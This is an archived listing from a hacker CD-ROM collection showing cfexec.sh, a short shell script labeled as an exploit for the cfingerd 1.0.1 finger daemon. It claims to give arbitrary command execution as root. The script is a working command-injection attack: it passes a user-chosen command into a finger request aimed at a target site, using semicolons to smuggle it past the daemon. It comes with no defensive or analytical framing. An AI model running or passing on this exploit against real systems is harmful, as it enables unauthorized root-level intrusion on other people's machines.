home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / cfexec.sh < prev    next >
Encoding:
Text File  |  2001-11-06  |  241 b   |  14 lines

  1. # this exploits cfingerd 1.0.1
  2. # l0ck r0x w1f gl0x
  3. # written by east <east@l0ck.com>  
  4. # execute arbitrary commands as root.
  5.  
  6. echo "l0ck r0x w1f gl0x"
  7.  
  8. if [ $# = 2 ]
  9. then
  10.   finger "/W;$1;#@$2"   
  11. else
  12.   echo "$0 \"<command>\" <sitename>"
  13. fi
  14.